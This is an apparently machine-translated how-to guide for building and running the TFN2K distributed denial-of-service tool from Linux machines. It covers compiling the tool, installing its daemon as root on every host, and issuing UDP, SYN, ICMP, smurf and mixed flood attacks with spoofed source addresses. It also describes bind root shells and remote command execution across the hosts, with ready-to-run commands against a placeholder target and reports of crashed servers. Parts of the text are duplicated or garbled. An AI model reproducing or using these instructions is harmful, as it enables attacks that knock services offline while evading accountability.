Linux DDOS attack on Windows system

First of all, the configuration method of the client and server we used to attack, using the most famous REDHAT LINUX for testing, I used FEDORA CORE3 for this attack test, the software uses the most famous DDOS.

First of all, the configuration method of the client and server we used to attack, using the most famous REDHAT LINUX for testing, I used FEDORA CORE3 for this attack test, the software uses the most famous DDOS .

Don't talk nonsense, start setting up the server.

Unpacking tar -zxvf tfn2k.tgz

1. Installing TFN2K

TFN2K is open source software, so we need to compile it. Needless to say, this should be compiled. It's all going to be, but there are a few places that must be noted, because different versions and vendors of Linux require different settings.

First modify src/ip.h

Comment out the following sections, otherwise the compilation will fail.

/*struct in_addr

{

unsigned long int s_addr;

};*/

Then make compile

When compiling, you will be prompted to enter the server to set the password to 8-32 digits. (You need to enter the password when attacking.) After compiling, two new executable files, td and tfn, will appear. td is the daemon and also the client. The process of using the machine. And tfn is the server control process. If you want to attack others, you must start the process of td first, and then run the server process. Otherwise, the attack is invalid. You can change the password and perform mkpass to change it. Finally, install and run td (requires ROOT permission) on all clients, and create a text file on the server. All the client IP addresses are recorded in the file (it is possible to edit one with VI) in the format:

192.168.0.1

192.168.0.2

192.168.0.3

IP

IP

……< Br>

Then run on the main server. /tfn

II. Attack

./tfn Directly enter, you can see some parameters, good friends in English are not expected to use me More talked about :)

Format./tfn <Parameters>

Unusable parameters We don't mention, we use

-f for this attack The name of the text file just written is the real DDOS attack, not the DOS

-h DOS attack, which is a stand-alone, one-to-one attack followed by a host or IP address

-p Specify a port later, needless to say

-c The most critical parameters, a total of 11 phases

0 - stop the attack, use the good

1 - Anti-spoofing level setting, because the TFN tool sends a packet with the source address at the time of the attack, but the source address is random, that is, the address is not self-sufficient, so don't worry about the police. Haha

2 - Adapting the packet size of the packet: The default ICMP/8, smurf, udp attack defaults to the smallest package. You can increase its size by changing the byte of each packet's payload.

3 - Bind the root shell: Start a session service, then you can get a root shell by connecting to a specific port.

4 - UDP Flood Attack: This attack exploits the fact that each udp packet is sent to a closed port, so that an ICMP unreachable message is returned, increasing the ability of the attack.

5 - SYN Flood Attack: This attack regularly sends false connection requests. The result will be the target port denial of service, adding a TCP connection table, increasing the attack potential by TCP/RST response to the non-existing host, which is a standard denial of service attack.

6 - ICMP response (ping) attack: This attack sends a ping request for a fake address, and the target host will return a response packet of the same size.

7 - SMURF attack: Send a ping request with the address of the target host to broadcast the expansion, so that the target host will get a reply multiple times.

8 - MIX attack: send udp, syn, icmp packets alternately according to the 1:1:1 relationship, so that you can deal with routers, other packet forwarding devices, NIDS, sniffers, etc., and bombard bombing :) Br>

9 - TARGA3 Attack

10 - Remote command execution, this parameter is an additional function of TFN. In fact, TFN attacks are not only DOS, but also remote control, such as:

./tfn -f hostext -c 10 -i "mkdir /root/edison" Create edison on the root directory on all HOSTs, followed by the "command"

parameter Basically, the following attack

./tfn -f hostext -c 4 -i www.xxx.com

Use the host recorded in the hostext file to perform UDP attacks on the 163 server (all The td process must be started in the host)

./tfn -f hostext -c 5 -i www.xxx.com -p 80

Use the host recorded in the hostext file to perform the 163 server. TCP denial of service attack (80 attacks WEB, others needless to say)

./tfn -f hostext -c 6 -i www.xxx.com

Recording in the hostext file The host performs an ICMP attack on the 163 server (PING attack, buffer overflow immediately crashes)

./tfn -f hostext -c 8 -i www.xxx.com

Recording in the hostext file The host performs ICMP&TCP&UDP round attack on the 163 server (if the other party is a sniffer must cry)

./tfn -f hostext -c 0

Let the host stop attacking < Br>

Basically, finally talk about my test results

One-to-one attack, attack mode TCP connection mode Local local CPU 13% Attacked server CPU usage is above 70%, and fluctuates from time to time

Two-to-one attack, attack mode TCP connection mode Local local stand-alone CPU 13% Attacked server CPU usage 100%

Five-to-one attack, attack mode TCP connection mode Local local stand-alone CPU13 % The server being attacked crashes. I only have 6 machines in my home, but if there are more, dozens of machines, the average personal server will definitely die.

One-to-one attack, attack mode ICMP connection Local local CPU 18% attacked server CPU usage rate of 96% or more, Fluctuate from time to time two to one attack, attack ICMP connection local local stand-alone CPU18% the attacked server was unable to access, almost impossible to use, within half an hour of death. It seems the power is not small.